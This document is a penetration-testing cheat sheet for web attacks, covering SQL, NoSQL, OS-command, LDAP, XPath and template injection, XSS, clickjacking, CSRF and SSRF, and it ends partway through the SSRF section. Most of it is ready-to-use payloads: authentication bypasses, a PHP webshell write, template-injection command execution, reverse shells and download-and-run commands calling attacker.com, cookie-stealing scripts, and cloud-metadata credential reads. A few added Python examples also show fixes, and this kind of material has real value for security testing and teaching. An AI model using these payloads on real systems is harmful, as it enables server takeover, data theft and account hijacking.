01
SQL INJECTION (SQLi)
User input inserted into SQL queries without sanitization, allowing DB manipulation.
Where to Test
- Login Forms
- Search Fields
- URL Parameters
- POST Body
- Cookies
- HTTP Headers
- API JSON Params
- Order/Filter Fields
Detection Payloads
Basic Error Triggers
'
"
`
'--
'#
');--
" OR "1"="1
' OR '1'='1
1'
1"
1`
\
;;
%27
%22
Boolean-Based Detection
1 AND 1=1 → normal response
1 AND 1=2 → different response (confirms SQLi)
1 AND 1=1-- -
1 AND 2>1
1 AND 'a'='a'
1 AND 'a'='b'
Exploitation Payloads
Authentication Bypass
admin'--
admin'#
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1'--
' OR 'x'='x
" OR "1"="1"--
admin' AND '1'='1
' OR 1=1 LIMIT 1--
username=admin'--&password=anything
username=' OR 1=1--&password=anything
UNION-Based (column discovery)
-- Step 1: Find number of columns
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- ← error here = 2 columns
-- Step 2: Find injectable position
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- Step 3: Extract data
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
Error-Based (MySQL)
AND extractvalue(1,concat(0x7e,(SELECT version())))--
AND updatexml(1,concat(0x7e,(SELECT database())),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),(SELECT version()),CHAR(95),CHAR(33),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)--
Time-Based Blind SQLi
-- MySQL
1 AND SLEEP(5)--
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
-- MSSQL
1; WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'--
-- PostgreSQL
1; SELECT pg_sleep(5)--
-- pg_sleep() returns void, so it cannot sit directly in a boolean expression; wrap it in a subquery
' AND 1=(SELECT 1 FROM pg_sleep(5))--
-- Oracle
1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
Out-of-Band / DNS Exfil
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.attacker.com\\a'))--
'; exec master..xp_dirtree '\\attacker.com\a'-- (MSSQL: the UNC path forces a DNS/SMB lookup)
-- File write, not exfil (MySQL; needs the FILE privilege, secure_file_priv unset, and the column count found with ORDER BY):
' UNION SELECT "<?php system($_GET['cmd']); ?>",NULL INTO OUTFILE '/var/www/html/shell.php'--
Database Fingerprinting
-- MySQL
' AND SUBSTRING(version(),1,1)='5'--
-- PostgreSQL
' AND version() LIKE '%PostgreSQL%'--
-- MSSQL
' AND @@version LIKE '%Microsoft%'--
-- Oracle
' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--
Testing Method
Manual Steps
1. Identify all input vectors (forms, params, headers, cookies)
2. Inject a single quote (') and observe error messages
3. Try boolean-based payloads and compare responses
4. Use ORDER BY to determine column count
5. Use UNION SELECT to extract data
6. If blind, use time-based or DNS-exfil methods
7. Enumerate: version(), database(), tables, columns, data
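Worked example (added here; not part of the original cheat sheet): the boolean-based detection step and blind extraction run end to end against a constructed in-memory SQLite table. The vulnerable login, the parameterised fix, the `users` table and its rows are assumptions for the demo; the oracle plus binary search is the logic you would point at a real parameter, swapping `unicode(substr(...))` for the target DBMS's `ASCII(SUBSTRING(...))`.

```python
import sqlite3

# Constructed sample schema and rows; stands in for the target's `users` table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('admin', 'S3cret!'), ('bob', 'hunter2');
    """)
    return db

def vulnerable_login(db, username, password):
    # The query is built by string formatting, so quotes and `--` in the
    # input become SQL syntax (admin'-- comments out the password check).
    sql = f"SELECT id FROM users WHERE username='{username}' AND password='{password}'"
    return db.execute(sql).fetchone() is not None

def safe_login(db, username, password):
    # Parameterised query: the driver sends values separately from the SQL text.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

def boolean_oracle(db, condition):
    """Models the boolean-based detection step: the injected condition is
    ANDed onto a query that normally returns one row, so a true condition
    gives the 'normal' response and a false one the 'different' response."""
    sql = f"SELECT id FROM users WHERE id=1 AND {condition}"
    return db.execute(sql).fetchone() is not None

def blind_extract(db, subquery, max_len=64):
    """Recover the result of `subquery` using only the true/false oracle.
    Each character's code point is found by binary search: 7 requests per
    character instead of up to 128 linear guesses."""
    result = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(db, f"length(({subquery}))>={pos}"):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if boolean_oracle(db, f"unicode(substr(({subquery}),{pos},1))>={mid}"):
                lo = mid
            else:
                hi = mid - 1
        result += chr(lo)
    return result

if __name__ == "__main__":
    db = make_db()
    print("bypass:", vulnerable_login(db, "admin'--", "wrong"))
    print("safe  :", safe_login(db, "admin'--", "wrong"))
    print("blind :", blind_extract(db, "SELECT password FROM users WHERE username='admin'"))
```

Against a live target the oracle is "does the response look like the `1 AND 1=1` response", and each `boolean_oracle` call is one HTTP request; the bisection is what keeps blind extraction practical.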
Tools
sqlmap, Burp Suite, Havij, jSQL, BBQSQL, NoSQLMap
sqlmap -u "https://target.com/item?id=1" --dbs
sqlmap -u "https://target.com/item?id=1" -D dbname --tables
sqlmap -u "https://target.com/item?id=1" -D dbname -T users --dump
sqlmap -r request.txt --level=5 --risk=3 --batch
sqlmap -u "https://target.com/" --data="user=a&pass=b" -p user --dbs
Impact
- Full database dump (credentials, PII)
- Authentication bypass
- Data modification / deletion
- Remote code execution (xp_cmdshell / UDF)
- Server file read/write
02
NoSQL INJECTION
Injection into MongoDB, CouchDB, Redis queries via operator abuse or type confusion.
Where to Test
- Login Forms
- JSON POST body
- URL params
- API Endpoints
- Search Fields
Detection Payloads
// URL parameter injection
?username[$ne]=test
?username[$gt]=
?username[$regex]=.*
// JSON body injection
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
Exploitation Payloads
Authentication Bypass (MongoDB)
// POST body - JSON
{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}
{"username": "admin", "password": {"$ne": "wrong"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
// URL param style
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&password[$ne]=lol
username[$exists]=true&password[$exists]=true
Data Extraction (Blind - MongoDB)
// Extract field character by character
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}
// JavaScript injection ($where)
{"$where": "this.username == 'admin'"}
{"$where": "sleep(5000)"} // time-based
{"$where": "return (this.password.match(/^a/))"}
// $lookup abuse: $lookup is an aggregation-pipeline stage, not a query operator, so it only works where user input reaches an aggregate() pipeline (e.g. a JSON body that becomes a stage)
[{"$lookup": {"from": "users", "localField": "_id", "foreignField": "_id", "as": "dump"}}]
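Worked example (added here; not part of the original cheat sheet): how `username[$ne]=x` turns into an operator object, why that logs in as the first user, and the `$regex` prefix loop from the blind-extraction block. The query-string parser and the tiny in-memory matcher imitate an Express/Mongoose stack; the `USERS` documents are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl

# Constructed stand-in for a MongoDB `users` collection.
USERS = [
    {"username": "admin", "password": "Sup3rAdmin"},
    {"username": "bob", "password": "hunter2"},
]

def parse_query(qs):
    """Mimic a body/query-string parser such as Express' qs, which turns
    `username[$ne]=x` into {'username': {'$ne': 'x'}}.  This is the step
    that lets a string field reach the driver as an operator object."""
    out = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        m = re.fullmatch(r"(\w+)\[(\$?\w+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out

def matches(value, cond):
    """Evaluate the subset of MongoDB query operators used in this section."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$gt":
            if not value > arg:
                return False
        elif op == "$regex":
            if not re.search(arg, value):
                return False
        else:
            raise ValueError(f"operator {op} not modelled")
    return True

def find_one(query):
    for doc in USERS:
        if all(matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None

def vulnerable_login(qs):
    # Passes the parsed structure straight to the query, operators included.
    return find_one(parse_query(qs))

def safe_login(qs):
    # Credentials must be plain strings; an operator object is a failed login.
    query = parse_query(qs)
    if not all(isinstance(v, str) for v in query.values()):
        return None
    return find_one(query)

ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

def blind_extract_password(username, alphabet=ALPHABET, max_len=64):
    """Blind extraction with $regex prefix probes: each round extends the
    known prefix by the one character whose probe still logs in."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            probe = {"username": username, "password": {"$regex": "^" + re.escape(known + ch)}}
            if find_one(probe):
                known += ch
                break
        else:
            break  # no character extends the prefix: the value is complete
    return known
```

The fix shown is the minimum: cast credential fields to strings (or reject non-strings) before they reach the driver; libraries like mongo-sanitize do the same by stripping keys that start with `$`.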
Redis Injection
// CRLF injection into Redis commands (only when the app builds the RESP stream from raw input; after the two CONFIG SET lines, a SET of PHP code followed by SAVE writes the webshell)
test\r\nSET injected "hacked"\r\n
test\r\nCONFIG SET dir /var/www/html\r\n
test\r\nCONFIG SET dbfilename shell.php\r\n
Tools
NoSQLMap, Burp Suite, nosqli
nosqlmap --attack db --url "http://target.com/login" --postdata "user=INJECT&pass=test"
Impact
- Authentication bypass
- Data exfiltration
- DoS via slow queries
03
OS COMMAND INJECTION
Application passes user input to shell commands without sanitization.
Where to Test
- Ping/Traceroute tools
- File conversion features
- Email fields
- Filename params
- DNS lookup tools
- Network utils
Detection Payloads
; ls
| ls
|| ls
& ls
&& ls
` ls `
$(ls)
; sleep 5
| sleep 5
|| sleep 5
; ping -c 5 attacker.com
$(ping -c 1 attacker.com)
Exploitation Payloads
Linux Payloads
; id; whoami; uname -a
| cat /etc/passwd
&& cat /etc/shadow
; ls -la /
$(cat /etc/passwd)
`cat /etc/passwd`
; curl http://attacker.com/$(whoami)
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
; wget http://attacker.com/shell.sh -O /tmp/s.sh && chmod +x /tmp/s.sh && /tmp/s.sh
Windows Payloads
& dir
| type C:\Windows\win.ini
& whoami
& ipconfig /all
& net user
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
& cmd /c "certutil -urlcache -split -f http://attacker.com/nc.exe c:\nc.exe"
Blind OS Command Injection
// Time-based detection
; sleep 10
|| ping -c 10 127.0.0.1
// Out-of-band detection
; nslookup attacker.com
; curl http://burp-collab.com/$(whoami)
; wget http://attacker.com/?output=$(id|base64)
WAF Bypass Techniques
;{ls,-la}
;l\s
;/bin/l's'
;$(printf '\x6c\x73') # ls hex encoded
;$IFS$9ls # IFS bypass
;cat$IFS/etc/passwd
;c${u}at /etc/passwd
Testing Method
Manual Steps
1. Find parameters passed to system functions
2. Inject command separators (;, |, &, &&, ||)
3. Use time-delay to confirm blind injection (sleep 5)
4. Use out-of-band (DNS/HTTP) to exfiltrate data
5. Escalate to full shell access
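Worked example (added here; not part of the original cheat sheet): the ping-style pattern the section targets, written three ways. `echo` stands in for `ping` so it runs offline; the host allowlist regex and the "did the shell interpret anything" oracle are assumptions for the demo. It shows that dropping the shell is necessary but not sufficient: without validation, a value such as `-n` still becomes an option of the command.

```python
import re
import subprocess

def vulnerable_lookup(host):
    """Builds the command by string concatenation and hands it to /bin/sh,
    the pattern behind ping/traceroute/nslookup-style injection.  `echo`
    stands in for `ping` so the example runs anywhere without network."""
    return subprocess.run(f"echo pinging {host}", shell=True,
                          capture_output=True, text=True).stdout

def argv_lookup(host):
    """No shell: the value is one argv element, so ; | && $( ) stay literal.
    This alone still allows option injection (a host of '-n' becomes a flag)."""
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout

# Hostname / IPv4 literal allowlist: first char alphanumeric (so no leading '-'),
# then only the characters a DNS name can contain.
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

def validate_host(host):
    return HOST_RE.fullmatch(host) is not None

def safe_lookup(host):
    """Allowlist the value, then call without a shell."""
    if not validate_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return argv_lookup(host)

def command_was_injected(host, output):
    """Detection oracle: a shell-free call must echo the host verbatim;
    anything else means a metacharacter was interpreted (a second command
    ran, a substitution happened, or the output was piped away)."""
    return output.rstrip("\n") != f"pinging {host}"

if __name__ == "__main__":
    for payload in ("127.0.0.1; echo INJECTED", "127.0.0.1 $(echo INJECTED)",
                    "127.0.0.1 | echo INJECTED"):
        print(repr(payload),
              "shell:", command_was_injected(payload, vulnerable_lookup(payload)),
              "argv: ", command_was_injected(payload, argv_lookup(payload)))
```

On a real target the oracle is the time delay or the out-of-band callback listed above rather than a compared echo, but the three payload shapes (separator, substitution, pipe) are the same ones to try first.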
Tools
Burp Suite, commix, Burp Collaborator
commix --url="http://target.com/ping?host=INJECT" --level=3
Impact
- Full server compromise
- Reverse shell / RCE
- File system access
- Lateral movement
04
LDAP INJECTION
Manipulating LDAP queries to bypass authentication or extract directory data.
Where to Test
- Login Forms
- Directory Search
- User Lookup fields
- Corporate SSO
Detection & Exploitation Payloads
// Authentication bypass
*)(uid=*))(|(uid=*
admin)(&)
admin)(|(password=*)
*)(|(objectclass=*))
// Blind extraction - enumerate characters
*)(uid=a* → returns users starting with 'a'
*)(uid=ad* → continue character by character
// Full LDAP filter bypass
user=*)(|(cn=*)
pass=))%00
// Extract all users
*)(|(cn=*))%00
*))%00
// DN injection
admin)(|(userPassword=*)
*)(objectclass=*))(|(objectclass=*
Tools
Burp Suite, ldap-brute, OWASP ZAP
Impact
- Authentication bypass
- Directory enumeration
- Credential harvesting
05
XPATH / XML INJECTION
Injecting into XPath expressions or XML parsers to bypass auth or extract data.
Detection Payloads
'
"
'or '1'='1
' or '1'='1
" or "1"="1
' or ''='
x' or 1=1 or 'x'='y
' and count(/*)=1 and '1'='1
Authentication Bypass
// XPath 1.0 bypass
' or '1'='1
' or 1=1 or ''='
") or "1"="1
admin' or '1'='1
// Extract node names
' or name()='user' or '1'='
' and substring(name(/*[1]),1,1)='u' or '1'='
XML Entity Injection
// Detect XML parsing
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<user>&test;</user>
// SSRF via XXE (see XXE section for full list)
Tools
Burp Suite, xcat, OWASP ZAP
06
SERVER-SIDE TEMPLATE INJECTION (SSTI)
Injecting template syntax that is evaluated by the server-side template engine.
Where to Test
- URL Parameters
- Form Fields
- Email Templates
- User Profile fields
- Error Pages
- Headers (User-Agent)
Detection - Identify Engine
// Generic polyglot detection (inject and observe output)
{{7*7}} → 49 (Jinja2/Twig)
${7*7} → 49 (FreeMarker/Thymeleaf)
<%= 7*7 %> → 49 (ERB/Ruby)
#{7*7} → 49 (Ruby)
*{7*7} → 49 (Thymeleaf)
{{7*'7'}} → 7777777 (Jinja2) vs 49 (Twig)
${{7*7}}
{{config}} → Jinja2 config dump
#{T(java.lang.Runtime).getRuntime()}
Exploitation by Engine
Jinja2 (Python/Flask)
{{config}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
// the index of subprocess.Popen in __subclasses__() differs per Python build; dump {{''.__class__.mro()[1].__subclasses__()}} first and pick the right one
{{''.__class__.mro()[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{%for c in [].__class__.__base__.__subclasses__()%}{%if c.__name__=='catch_warnings'%}{{c.__init__.__globals__['__builtins__']['__import__']('os').system('id')}}{%endif%}{%endfor%}
Twig (PHP)
{{7*7}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('passthru')}}
{{app.request.server.all|join(',')}}
{{['id']|map('passthru')}}   ({{a|system}} is not a Twig filter; a callable name only runs through filter/map/sort-style filters)
FreeMarker (Java)
${"freemarker.template.utility.Execute"?new()("id")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ex('id')}
ERB (Ruby)
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
Velocity (Java)
#set($x='')##
#set($rt = $x.class.forName('java.lang.Runtime'))
#set($chr = $x.class.forName('java.lang.Character'))
#set($str = $x.class.forName('java.lang.String'))
#set($ex=$rt.getRuntime().exec('id'))
$ex.waitFor()
#set($out = $ex.getInputStream())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
Tools
tplmap, Burp Suite, SSTImap
tplmap -u "http://target.com/page?name=INJECT"
sstimap -u "http://target.com/?tmpl=INJECT" --os-shell
Impact
- Remote Code Execution
- Full server takeover
- File read/write
07
REFLECTED XSS
Malicious script reflected from server in the HTTP response, executed in victim's browser.
Where to Test
- URL Parameters
- Search Fields
- Error Messages
- Referrer Header
- User-Agent
- Redirect params
Detection Payloads
// Basic detection - look for reflection in source
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)
<svg onload=alert(1)>
'';!--"<XSS>=&{()}
%3Cscript%3Ealert(1)%3C/script%3E // URL encoded
Context-Aware Payloads
HTML Context
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<svg/onload=alert(1)>
<iframe onload=alert(1)></iframe>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
Attribute Context (inside an attribute)
" onmouseover="alert(1)
" onfocus="alert(1)" autofocus="
' onclick='alert(1)
" style="animation-name:spinning" onanimationstart="alert(1)   (fires only if the page's CSS already defines a @keyframes named spinning; reuse a name from its stylesheet)
JavaScript Context
'-alert(1)-'
';alert(1)//
\';alert(1)//
</script><script>alert(1)</script>
"-alert(1)-"
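Worked example (added here; not part of the original cheat sheet): the three reflection contexts above with one payload each, first through a typical "strip `<script>`" deny-list filter and then through context-specific output encoding, the fix. The templates, the filter and the string-match oracle are assumptions for the demo; the payloads are the section's own. It also shows why a non-recursive filter is bypassed by nesting the tag it removes.

```python
import html
import re

# Constructed templates for the three reflection contexts in this section.
TEMPLATES = {
    "html":      "<p>Results for {q}</p>",
    "attribute": '<input type="text" value="{q}">',
    "js":        "<script>var q = '{q}';</script>",
}

# Payloads from the section, one per context.
PAYLOADS = {
    "html":      "<img src=x onerror=alert(1)>",
    "attribute": '" onfocus="alert(1)" autofocus="',
    "js":        "';alert(1)//",
}

def naive_filter(q):
    """Deny-list filter that strips <script ...> and </script> once,
    non-recursively.  Common, and bypassed by every payload above."""
    return re.sub(r"(?i)</?script[^>]*>", "", q)

def encode_for(context, q):
    """Context-specific output encoding (the fix).  HTML text and attribute
    values get entity encoding including quotes; JavaScript string data gets
    every non-alphanumeric character as \\uXXXX so nothing can close the
    quote or the <script> element."""
    if context in ("html", "attribute"):
        return html.escape(q, quote=True)
    if context == "js":
        return "".join(c if c.isalnum() else f"\\u{ord(c):04x}" for c in q)
    raise ValueError(context)

def reflect(context, q, sanitizer=naive_filter):
    """Render the template with the (filtered) input, as the server would."""
    return TEMPLATES[context].format(q=sanitizer(q))

def reflect_encoded(context, q):
    return reflect(context, q, sanitizer=lambda s: encode_for(context, s))

def still_breaks_out(context, page):
    """Cheap oracle: does the token that breaks the context survive verbatim?
    (A browser, or DOM Invader, confirms actual execution.)"""
    token = {"html": "<img", "attribute": '" onfocus="', "js": "';alert"}[context]
    return token in page
```

The encoder is deliberately per-context: entity-encoding a value that lands inside a `<script>` string does nothing for the JavaScript context, which is why the third payload keeps working behind many "we escape HTML" fixes.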
WAF Bypass Payloads
<ScRiPt>alert(1)</ScRiPt>
<script>alert`1`</script>
<img src=x oNeRrOr=alert(1)>
<img src=x onerror="alert(1)">
<a href="javascript:alert(1)">click</a>
<svg><script>alert(1)</script></svg>
<<script>alert(1)//<</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
// Legacy / browser-dependent: javascript: URLs in src/data/xlink:href are ignored by most current browsers; verify in the target's browser
<img src="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<math><a xlink:href="javascript:alert(1)">click</a></math>
Cookie Stealing Payload
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
<img src=x onerror="fetch('http://attacker.com/steal?c='+btoa(document.cookie))">
<svg onload="new Image().src='http://attacker.com/?c='+document.cookie">
Tools
Burp Suite, XSStrike, OWASP ZAP, dalfox, XSSer
xsstrike -u "http://target.com/search?q=INJECT"
dalfox url "http://target.com/search?q=INJECT"
Impact
- Session hijacking
- Cookie theft
- Phishing / defacement
- Keylogging
- Credential harvesting
08
STORED XSS (Persistent)
Malicious script stored in database and served to all users who view the infected content.
Where to Test
- Comments / Forums
- User Profile fields
- Product Reviews
- Admin Panels
- Log viewers
- File names
Key Payloads
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
// Blind XSS (fire when admin views logs)
"><script src=//attacker.com/xss.js></script>
<img src=x onerror="var x=new XMLHttpRequest();x.open('GET','//attacker.com/?c='+document.cookie);x.send()">
// Polyglot
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
// XSS via file upload (SVG)
// Upload a .svg file containing:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
<rect width="300" height="100" style="fill:rgb(0,0,255)"/>
</svg>
Blind XSS Tools
XSS Hunter, Burp Collaborator, CanaryTokens
Impact
- Mass session hijacking
- Admin account takeover
- Worm propagation
- Site-wide defacement
09
DOM-BASED XSS
Payload executed through client-side script DOM manipulation without server reflection.
Common Sources (Attacker Controls)
DOM Sources: document.URL, document.location, document.referrer, window.location.hash, window.location.search, document.cookie, localStorage, sessionStorage, postMessage data
Common Sinks (Dangerous Functions)
DOM Sinks: document.write(), innerHTML, outerHTML, eval(), setTimeout(), setInterval(), Function(), document.domain, element.src, element.href, location.href
Detection & Exploitation
// URL hash-based
http://target.com/page#<img src=x onerror=alert(1)>
http://target.com/page#<svg onload=alert(1)>
// location.search-based
http://target.com/page?search=<script>alert(1)</script>
// postMessage-based
// Only exploitable when the target's message listener does not check event.origin. From a page the target opened:
window.opener.postMessage("<img src=x onerror=alert(1)>","*")
// or from an attacker page that opened the target:
var w = window.open("http://target.com/page"); w.postMessage("<img src=x onerror=alert(1)>","*")
// AngularJS client-side template injection (the sandbox exists only in 1.2-1.5 and needs a version-specific escape; 1.0-1.1.5 and 1.6+ run the first payload as-is)
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
// DOM clobbering
<form id=x><input id=attributes></form>
Tools
DOM Invader (Burp), DOMDigger, JSShell
10
CLICKJACKING
Tricking users into clicking invisible iframed elements to perform unintended actions.
Detection
Check Response Headers:
Missing X-Frame-Options header
Missing Content-Security-Policy: frame-ancestors directive
Test: try embedding target in an iframe
// Test PoC - save as HTML and open
<html>
<head><style>
iframe {
width:500px; height:700px;
position:absolute; top:-100px; left:-200px;
opacity:0.0001; z-index:2;
}
button {
position:absolute; top:300px; left:100px; z-index:1;
}
</style></head>
<body>
<button>CLICK ME - WIN A PRIZE!</button>
<iframe src="https://target.com/delete-account"></iframe>
</body>
</html>
Tools
Burp Suiteclickjacker.pyOWASP ZAP
Impact
- Forced actions (delete, transfer)
- Social engineering attacks
- XSS delivery
11
CROSS-SITE REQUEST FORGERY (CSRF)
Forces an authenticated user to execute unwanted actions on a web application.
Where to Test
- State-changing actions
- Password change
- Email change
- Money transfer
- Profile update
- Delete actions
Detection
Check for
Absence of CSRF token in forms
Predictable / reusable CSRF tokens
Token not validated server-side
CSRF token in URL (leaks in Referrer)
Missing SameSite cookie attribute
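Worked example (added here; not part of the original cheat sheet) covering the clickjacking header checks in section 10 and the SameSite item in the CSRF checklist above: a response-header audit that decides whether a page is frameable and whether its session cookie will ride along on a cross-site request. The header sets it is run on are constructed; the precedence rule it encodes (CSP `frame-ancestors` overrides `X-Frame-Options`, `SameSite=None` requires `Secure`) is browser behaviour, not an assumption.

```python
def parse_set_cookie(header):
    """Split one Set-Cookie value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs

def frame_ancestors(csp_values):
    """Source list of the first frame-ancestors directive found, or None."""
    for csp in csp_values:
        for directive in csp.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                return [t.lower() for t in tokens[1:]] or ["'none'"]
    return None

def audit(headers):
    """headers: list of (name, value) pairs as received, duplicates preserved
    (Set-Cookie repeats).  Returns a list of findings for both checklists."""
    findings = []
    by_name = {}
    for name, value in headers:
        by_name.setdefault(name.lower(), []).append(value)

    # Clickjacking: frame-ancestors wins over X-Frame-Options when both exist.
    ancestors = frame_ancestors(by_name.get("content-security-policy", []))
    xfo = [v.strip().lower() for v in by_name.get("x-frame-options", [])]
    if ancestors is not None:
        if any(src in ("*", "http:", "https:") for src in ancestors):
            findings.append("frameable: frame-ancestors allows any origin")
    elif not xfo:
        findings.append("frameable: no X-Frame-Options and no CSP frame-ancestors")
    elif xfo[0] not in ("deny", "sameorigin"):
        findings.append(f"frameable: X-Frame-Options value {xfo[0]!r} is not honoured by browsers")

    # CSRF: the cookie attributes that decide whether it is sent cross-site.
    for raw in by_name.get("set-cookie", []):
        cookie, attrs = parse_set_cookie(raw)
        samesite = attrs.get("samesite", "").lower()
        if not samesite:
            findings.append(f"cookie {cookie}: no SameSite attribute (browser default applies)")
        elif samesite == "none" and "secure" not in attrs:
            findings.append(f"cookie {cookie}: SameSite=None without Secure (Chromium rejects it)")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie}: missing HttpOnly (readable by XSS)")
    return findings
```

Feed it the header list from a proxied response (Burp's "copy as list" or `resp.raw.headers.items()` in a script); an empty result means the two detection checklists pass for that response.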
Exploitation PoC
GET-based CSRF
// Victim visits attacker page, this fires automatically
<img src="https://target.com/transfer?to=attacker&amount=1000">
<iframe src="https://target.com/delete-account?confirm=yes"></iframe>
POST-based CSRF (Auto-Submit Form)
<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
<form action="https://target.com/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
<input type="hidden" name="confirm_email" value="attacker@evil.com">
</form>
</body>
</html>
CSRF Token Bypass Techniques
// 1. Delete CSRF token parameter entirely
// 2. Use another user's valid CSRF token
// 3. Change POST to GET (token validated only on POST)
// 4. Double submit cookie bypass - only if you can set a cookie on the target domain (subdomain, header injection)
// 5. Token tied to session but not to action - replay in different action
// 6. SameSite: cookies without the attribute default to Lax in Chromium but are still sent on top-level POST for 2 minutes after being set; SameSite=None cookies are always sent cross-site (and must carry Secure or Chromium drops them)
// 7. Referer check is a substring match - put the target's domain in the attacker URL:
// http://attacker.com/?target.com
JSON CSRF (Content-Type bypass)
<form enctype="text/plain" action="https://target.com/api/update" method="POST">
<input name='{"email":"attacker@evil.com","x":"' value='"}'>
</form>
Tools
Burp Suite (CSRF PoC generator), OWASP ZAP
Impact
- Account takeover
- Unauthorized fund transfer
- Data modification
12
SERVER-SIDE REQUEST FORGERY (SSRF)
Making the server issue requests to unintended internal or external resources.
Where to Test
- URL parameters
- Webhook URLs
- PDF generators
- Image fetch
- Import features
- Proxy params
Detection Payloads
// Internal service probing
http://127.0.0.1/
http://localhost/
http://0.0.0.0/
http://[::1]/
http://169.254.169.254/ (AWS metadata)
http://192.168.0.1/
http://10.0.0.1/
// Out-of-band detection
http://burp-collaborator.com/
http://attacker.com/ssrf-test
Exploitation Payloads
Cloud Metadata Endpoints
// AWS (IMDSv1; IMDSv2 needs a token obtained with a PUT and sent in a header, so a plain GET SSRF fails)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
// GCP (requires the header Metadata-Flavor: Google, so only reachable when you control request headers)
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
// Azure (requires the header Metadata: true)
http://169.254.169.254/metadata/instance?api-version=2021-02-01
// DigitalOcean
http://169.254.169.254/metadata/v1/
Protocol Schemes
file:///etc/passwd
file:///etc/hosts
file:///proc/self/environ
